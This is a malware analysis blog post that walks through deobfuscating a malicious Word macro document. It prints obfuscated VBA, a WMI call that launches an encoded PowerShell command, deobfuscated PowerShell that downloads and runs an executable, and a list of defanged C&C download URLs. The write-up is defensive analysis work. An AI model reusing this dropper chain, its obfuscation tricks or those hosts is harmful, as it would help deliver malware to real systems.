Simple Malicious Doc Analyst

Hi,

In October, we have received a strange file. This file is zipped with passwords. When we decompress file, TrendMicro engines is triggered and alerts that this is a strange file.

So I tried to inspect this file. First information:

File name: DAT 6021.doc

SHA256 : FBA41FDD9A1E8B12844D2ED37A39199DBBC262040AF00488032CA8DD37D99AF8

SHA1:783A12021EB09E34B5E8C5670D9C3F475B420CA8

I tried to analyze with Virustotal and 38/64 engines detected this file as malicious.

I opened this document with OpenOffice. As show in this picture, it required users to enable macro to view the file content.

Digging deeper this file with oletool (oledump,olevba) by Mr. Didier Stevens.

So, 3 module macro were using on this malicious file

More analysis with Olevba, we got some evidence like :

  • This file is automatically executed when the file is opened
  • Showwindow is hidden,
  • VBA code is obfuscated.
  • CreateObject and Create

I tried to use option “— reveal” of olevba and exported to txt file.

The VBA string code is obfuscated. Then we more analyzed it further with Word VBA.

Dump.txt file

First I opened malicious file and deactivated Document_open() method :D :D . Then I created new module call to function Bgqgd4o6a7s15p.E3kdptm5eku

After many trials of analysis and debug, I could see that the file was filled with many un-sense code below:

Un-sense code from VBA code

After removing all un-sense code, we received a file which was much more easier to analyze.

I could check that Tejuth3x8g5(Enlfvpl9suyy) Function :

Function Tejuth3x8g5(Enlfvpl9suyy)
On Error Resume Next

Tejuth3x8g5 = Replace(Enlfvpl9suyy, “][ 1) j” + “jkgS [] []w”, Bnp6gao1ceh2n2)

End Function

This function will remove all string “][ 1) jjkgS [] []w”. So we could remove all “strange string” in VBA code. Then I changed name of the function for ease of reading.

Function Main()On Error Resume Next
de = Zw0_qp5aijci62b.StoryRanges.Item(1)
X_1 = "ro][ 1) jjkg" + "S [] []wcess" + Z_ad7cc9grl19
X_2 = ":][ 1) jjkg" + "S [] []wwin32_" + B50l2j8q1mv_d
X_3 = "w][ 1) jjkgS [] []" + "winmgmt" + Dj72l9apx97bf0ax6
X_4 = ChrW(wdKeyS)
N7o6h4diutim = X_3 + X_4 + X_2 + Bgqgd4o6a7s15p.Awy9dyruwei62dtk + X_1
Output_1 = Replace_F_func(N7o6h4diutim)
Set Create_1 = CreateObject(Output_1)
Output_2 = Mid(de, 1, Len(de))
Output_3 = Rc_bhd73ptj + Output_1 + X_4 + Bgqgd4o6a7s15p.I54cmbdi6s9dngllid + Bgqgd4o6a7s15p.Auk2qcn7api1z_9u3
Set Create_2 = Created_OBject_F_func(Output_3 + Bgqgd4o6a7s15p.Awy9dyruwei62dtk)
Create_1.Create Replace_F_func(Output_2), N8_k48wuoajxhbqz, Create_2End Function

We could see that the de variable read content from document then it will be reduced and removed string “][ 1) jjkgS [] []w”. If we add Breakpoint and Watch we can collect variants and rewrite the source code. Within a few trials, I dump the full VBA string that real execute.

Set Create_1 = CreateObject(winmgmtS:win32_Process)
Set Create_2= CreateObject(winmgmtS:win32_ProcessStartuP)
Created_OBject_F_func.showwindow = 1/0
Create_1.Create POwersheLL -ENCOD cwBlAFQALQBpAFQARQBtACAAIAAoACcAdgBBACcAKwAnAHIASQBBAGIAJwArA.....AA=, , Create_2

Now, it seems that we have known more about this file. It creates execute process and adds it-self in ProcessStartUp.

Next, we decoded Powershell by base64. We received obfuscated Powershell code. But it is not too difficult to decode.

Base64 decoded

We could see that some code below can be converted.

seT-iTEm  ('vA'+'rIAb'+'LE:GkJ') ([tYPE]("{1}{4}{2}{0}{3}" -F 'cT','SYSTem.I','dIre','oRY','o.')  )  ;>> set-item  ('variable:gkj') system.io.directory$dyl=  [TYPE]("{3}{1}{5}{2}{6}{4}{0}" -F 'nTMAnAgER','tEm.n','i','SyS','POI','et.SErV','ce')  ;>> $dyl=  system.net.servicepointmanager(  gEt-VaRiAbLE  ("gk"+"j")).vAluE::"C`ReATEdirec`T`ory"($HOME + ((('r'+'5vJd')+('e7'+'91')+('sr5v'+'S')+('6c'+'9')+('a'+'5'+'gr5v'))-C RePlacE ('r'+'5v'),[cHaR]92));>> get-variable  "gkj".value::"createdirectory"($home + ('/jde791s/s6c9a5g/'))

After a few steps, I removed some un-necessary string the final gift was revealed.

Simple code above, the file will download from list C&C Server then save file:

$HOME+’/Jde791s/S6c9a5g/Niqwjqup.exe’’

Then check if the file is downloaded , if yes then execute it.

If ((.(‘Get-Item’) $C0ouaj1).”lENGTH” -ge 49574)

([wmiclass]((‘win32_Process’))).”CREATE”($HOME+’/Jde791s/S6c9a5g/Niqwjqup.exe’;);

I tried to download the file but I could not get any file. So I finish my analyst report here.

Name: DAT 6021_ original.docSize: 266262 bytes (260 KiB)SHA256: FBA41FDD9A1E8B12844D2ED37A39199DBBC262040AF00488032CA8DD37D99AF844/63 engines detected this file C&C Server: h’’p://www.royalempresshair.com/wp-content/upgrade/Fj/
h’’p://acredales.com/thank_you/d/
h’’p://mail.bursaevdenevenakliyat.link/jelab/YSS/
h’’ps://180clubrealestate.com/wp-includes/0go/
h’’ps://albertoordonez.com/coinpot-faucet/vo8/
h’’p://techofbeauty.com/cgi-bin/o0/')

Thanks for your reading and hope you are doing well!.

またね

Reference:

www.virustotal.com
oledump.py | Didier Stevens
Malware analyst series of m4n0w4r – Medium.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store